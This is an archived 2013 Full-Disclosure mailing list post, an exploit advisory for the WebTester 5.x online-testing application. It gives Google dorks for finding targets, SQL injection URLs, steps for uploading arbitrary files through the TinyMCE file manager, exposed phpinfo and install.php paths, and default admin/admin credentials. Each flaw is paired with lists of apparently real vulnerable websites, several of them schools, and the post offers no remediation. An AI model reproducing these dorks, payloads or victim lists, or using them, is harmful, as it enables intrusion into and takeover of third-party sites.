lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1381887130.26226.YahooMailNeo@web190706.mail.sg3.yahoo.com>
Date: Wed, 16 Oct 2013 09:32:10 +0800 (SGT)
From: X-Cisadane <stefanus_dp@...il.com>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: WebTester 5.x Multiple Vulnerabilities

========================================================================================== 
WebTester 5.x Multiple Vulnerabilities 
========================================================================================== 

:--------------------------------------------------------------------------------------------------------------------------

--------------: 
: # Exploit Title : WebTester 5.x Multiple Vulnerabilities  
: # Date : 15 October 2013 
: # Author : X-Cisadane 
: # CMS Developer : http://epplersoft.com/webtester.html 
: # CMS Source Code : http://sourceforge.net/projects/webtesteronline/ 
: # Version : ALL 
: # Category : Web Applications 
: # Vulnerability : SQL Injection, Arbitrary File Upload, PHPInfo() Disclosure, Leftover install.php File
: # Tested On : Google Chrome Version 26.0.1410.64 m (Windows XP SP 3 32-Bit English) 
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, 

Winda Utari 
:--------------------------------------------------------------------------------------------------------------------------

--------------: 

DORKS (How to find the target) : 
================================ 
intext:Copyright © 2003 - 2010 Eppler Software 
inurl:/go.php?testID= 
intitle:WebTester Online Testing 
Or use your own Google Dorks :) 

Proof of Concept  
================  

[ 1 ] SQL Injection 
POC : http://[Site]/[Path]/startTest.php?FirstName=a&LastName=a&TestID=['SQLi] 
Example : 
http://simuladodireitocespe.com/startTest.php?FirstName=a&LastName=a&TestID='5 
http://www.huertos.eu/encuesta/startTest.php?FirstName=a&LastName=a&TestID='5 
http://autoskola-buratrans.com/templates/default/ispiti/startTest.php?FirstName=a&LastName=a&TestID='5 
http://conalepnl091.sytes.net/simulador/startTest.php?FirstName=a&LastName=a&TestID='5 
http://learnin.elschool.pl/startTest.php?FirstName=a&LastName=a&TestID='5 
...etc... 

[ 2 ] Arbitrary File Upload through TinyMCE (plugins/filemanager)  
Webster 5.x has a built-in WYSIWYG Editor, that is TinyMCE. The attacker can upload file through the TinyMCE File Manager. 
It can be found in tiny_mce/plugins/filemanager. 

Poc : http://[Site]/[Path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php 
Example the target is http://onlinetests.germaniak.eu/ 
Change the url to http://onlinetests.germaniak.eu/tiny_mce/plugins/filemanager/InsertFile/insert_file.php 
Pic #1 : http://i40.tinypic.com/117z390.png 
Then tick : Insert filetype icon, Insert file size & Insert file modification date. 
Click upload and wait until the file sent to the server. 
Pic #2 : http://i39.tinypic.com/2wluaon.png 
Pic #3 : http://i40.tinypic.com/2uh0fir.png 
If the file was successfully uploaded, check in the /test-images/ directory. 
For Example : 
http://onlinetests.germaniak.eu/test-images/ 
http://www.rzecznik.org/test/test-images/ 
http://simula.se/fun/webtester5/test-images/ 
http://811lifestylecoach.com/test-images/ 
http://umpire-test.splashprojects.co.uk/test-images/ 
http://zamoweb.altervista.org/test-images/ 
...etc... 

[ 3 ] PHPInfo() Disclosure 
POC : http://[Site]/[Path]/phpinfo.php 
Example : 
http://mhsquiz.marbleheadschools.org/webtester/phpinfo.php 
http://test.auzefiu.com/phpinfo.php 
http://test.deltaschools.com/phpinfo.php 
http://www.noordskool.com/toetse/phpinfo.php 
http://bocahomehealth.com/exam/phpinfo.php 
...etc... 

[ 4 ] Leftover install.php File 
POC : http://[Site]/[Path]/install.php
Example : 
http://www.ibeucamposmacae.com.br/webtester5/install.php 
http://briefhealthprograms.com/webtester5/install.php 
http://intgvna.gardnervna.org/test/install.php 
http://delarcollege.com/POSTUTME/install.php 
http://www.orionhs.org/webtester/install.php 
...etc... 

Bonus : Default Username and Password 
Username : admin 
Password : admin 
Admin Control Panel : http://[Site]/[Path]/admin/
 
Sent from my BlackBerry® smartphone from Sinyal Bagus XL, Nyambung Teruuusss...!

________________________________
Content of type "text/html" skipped

View attachment "Proof of Concept.txt" of type "text/plain" (3948 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ